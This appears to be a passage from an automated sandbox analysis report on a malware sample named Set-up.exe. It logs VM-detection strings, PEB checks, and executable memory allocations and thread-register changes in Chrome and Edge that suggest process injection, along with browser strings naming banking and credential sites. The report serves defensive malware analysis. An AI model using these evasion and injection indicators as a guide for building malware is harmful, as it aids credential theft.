Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Set-up.exe API/Special instruction interceptor: Address: 7FF84F7AD304
Source: C:\Users\user\Desktop\Set-up.exe API/Special instruction interceptor: Address: 7FF84F7AD744
Source: C:\Users\user\Desktop\Set-up.exe API/Special instruction interceptor: Address: 7FF84F7B0154
Source: C:\Users\user\Desktop\Set-up.exe API/Special instruction interceptor: Address: 7FF84F7ADA44
Source: Amcache.hve.7.dr Binary or memory string: VMware
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.7.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Amcache.hve.7.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Amcache.hve.7.dr Binary or memory string: vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Amcache.hve.7.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.7.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr Binary or memory string: VMware, Inc.
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: Amcache.hve.7.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Amcache.hve.7.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.7.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Amcache.hve.7.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Amcache.hve.7.dr Binary or memory string: VMware Virtual RAMX
Source: Amcache.hve.7.dr Binary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
Source: Amcache.hve.7.dr Binary or memory string: vmci.syshbin`
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Amcache.hve.7.dr Binary or memory string: \driver\vmci,\driver\pci
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Amcache.hve.7.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Amcache.hve.7.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: msedge.exe, 0000001F.00000003.1644447641.000001C72B225000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: C:\Users\user\Desktop\Set-up.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_0267143D RtlInitAnsiString,LdrGetProcedureAddress, 0_2_0267143D
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_02685BC0 mov eax, dword ptr fs:[00000030h] 0_2_02685BC0
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D062F mov edx, dword ptr fs:[00000030h] 0_2_043D062F
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D0BEF mov eax, dword ptr fs:[00000030h] 0_2_043D0BEF
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D123F mov eax, dword ptr fs:[00000030h] 0_2_043D123F
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D123E mov eax, dword ptr fs:[00000030h] 0_2_043D123E
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D1C2D mov eax, dword ptr fs:[00000030h] 0_2_043D1C2D
Source: C:\Users\user\Desktop\Set-up.exe Code function: 0_2_043D0F9F mov eax, dword ptr fs:[00000030h] 0_2_043D0F9F

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0230000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0240000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0250000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0260000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 219D0270000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 21C401D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384170000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384180000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 14384190000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 143841C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FED0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEE0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FEF0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF00000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF10000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1FB3FF20000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687980000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 27687990000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 276879D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF380000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF390000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3C0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 297CF3D0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF860000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF870000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF880000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF890000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF8A0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files\Google\Chrome\Application\chrome.exe base: 22EAF8B0000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B130000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B140000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B150000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B160000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B170000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe Memory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1C72B180000 protect: page execute and read and write
Source: C:\Users\user\Desktop\Set-up.exe NtAllocateVirtualMemory: Indirect: 0x268845D
Source: C:\Users\user\Desktop\Set-up.exe Thread register set: target process: 1300
Source: C:\Users\user\Desktop\Set-up.exe Thread register set: target process: 6184
